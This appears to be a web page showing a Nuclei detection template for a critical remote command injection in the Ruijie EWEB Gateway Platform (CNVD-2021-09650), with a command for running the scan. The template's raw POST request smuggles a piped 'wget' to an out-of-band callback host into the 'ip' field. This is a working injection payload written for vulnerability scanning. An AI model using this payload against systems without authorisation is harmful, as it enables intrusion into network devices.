Ruijie Networks-EWEB Network Management System - Remote Code Execution

ID: CNVD-2021-09650

Severity: critical

Author: daffainfo,pikpikcu

Tags: cnvd,cnvd2021,ruijie,rce

Description

Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.

YAML Source

id: CNVD-2021-09650

info:
  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
  author: daffainfo,pikpikcu
  severity: critical
  description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
  reference:
    - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
    - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
    - https://www.ruijienetworks.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: cnvd,cnvd2021,ruijie,rce

http:
  - raw:
      - |
        POST /guest_auth/guestIsUp.php HTTP/1.1
        Host: {{Hostname}}

        mac=1&ip=127.0.0.1|wget {{interactsh-url}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"
# digest: 490a004630440220534a796db57d3e437a316e7909445f465bfa46c5bed6d027bb25900e9d8ec0bc0220476821fc2f70492471c6d1c948ae467b2e3ac16f9fd606250c6b8f4fd0c217ed:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cnvd/2021/CNVD-2021-09650.yaml"

View on Github